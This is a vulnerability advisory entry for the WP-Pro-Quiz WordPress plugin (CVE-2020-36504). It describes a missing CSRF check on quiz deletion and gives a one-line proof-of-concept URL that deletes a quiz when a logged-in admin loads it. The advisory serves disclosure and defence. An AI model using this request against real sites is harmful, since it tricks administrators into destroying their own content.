WordPress Plugin Vulnerabilities

WP-Pro-Quiz <= 0.37 - Arbitrary Quiz Deletion via CSRF

Description

The plugin does not have CSRF check in place when deleting a quiz, which could allow an attacker to make a logged in admin delete arbitrary quiz on the blog

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpProQuiz&action=delete&id=4

Affects Plugins

Plugin icon
wp-pro-quiz
No known fix

References

CVE
CVE-2020-36504
URL
https://medium.com/@hoanhp/0-days-story-1-wp-pro-quiz-2115dd77a6d4

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
HoanHP
Submitter
hoan
Submitter twitter
HoanHP
Verified
Yes
WPVDB ID
83679b90-faa5-454e-924c-89f388eccbd1

Timeline

Publicly Published
2020-06-22 (about 3 years ago)
Added
2020-06-22 (about 3 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2023-04-28
Title
WP Directory Kit < 1.2.0 - Cross-Site Request Forgery
Published
2022-07-05
Title
Visualizer: Tables and Charts Manager for WordPress < 3.7.10 - Contributor+ PHAR Deserialization
Published
2022-05-31
Title
WP Post Styling < 1.3.1 - Multiple CSRF
Published
2013-07-04
Title
Sharebar < 1.4.1 - Button Manipulation CSRF
Published
2021-07-05
Title
Travel Light <= 1.0 - CSRF Bypass